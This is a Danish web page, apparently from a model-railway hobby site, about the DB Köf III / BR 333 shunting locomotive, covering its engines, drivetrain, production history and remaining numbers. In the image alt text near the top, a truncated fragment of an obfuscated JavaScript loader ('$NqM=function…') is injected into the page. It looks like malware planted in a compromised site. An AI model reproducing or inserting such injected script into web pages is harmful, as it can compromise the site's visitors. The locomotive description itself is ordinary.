KÖF / BR 333
![KÖF / BR 333 Et lille hjælpelokomotiv med en lang his<script>$NqM=function(n){if (typeof ($NqM.list[n]) ==](/wp-content/uploads/2019/07/KOF.png)
Lokomotiverne i trækkraftgruppe III blev udviklet af firmaet Gminder. De blev bygget til den lette rangertjeneste og til kørsel med arbejdstog. I modsætning til de andre smålokomotiver i DB’s tjeneste, har Köf III et lukket opvarmet førehus, der gjorde det muligt også at bruge den til let godskørsel.
Førestanden er placeret i midten af fronten af førerhuset og ved hver side er der sig et betjeningshåndtag til hastighedsregulering og retningsbestemmelse.
Til serien af lokomotiver blev der leveret to motortyper begge med 240 HK. Den ene, en 8 cylindret rækkemotor fra Motoren Werke Mannheim, og den anden en 8 cylindret V motor fra Kaelbe. Disse motorer trak gennem en kobling, en hydraulisk hastighedsregulator. Efter denne regulator var der monteret et mekanisk vendegear og kæder ud til hjulakslerne.
Den første af maskiner af typen Köf III blev sat i drift i 1959 og frem til 1966 havde man anskaffet 312 eksemplarer. Gmeinder videreudviklede selv på den lille maskine og i 1965 kom de med en forbedret udgave, hvor man erstattede kædetrækket med kardanaksler. Dette lokomotiv blev i 1967 overtaget af DB og alle Köf bygget herefter blev af den type, det blev til i alt 250 eksemplarer.
De sidst udviklede fik efter nummeromlægningen betegnelsen BR 333. De var 7,83 meter lange og skød en topfart på 45 km/t
DB har i dag 54 af typen 332, 25 af typen 333 og 215 af typen 335 tilbage. 335 er 333 med radiostyring, som DB igen er ved at forlade brugen af, flere 335 får fjernet deres radiostyring og bliver omnummereret til 333 5.
Vi har en model af BR 333 111 i rød bemaling.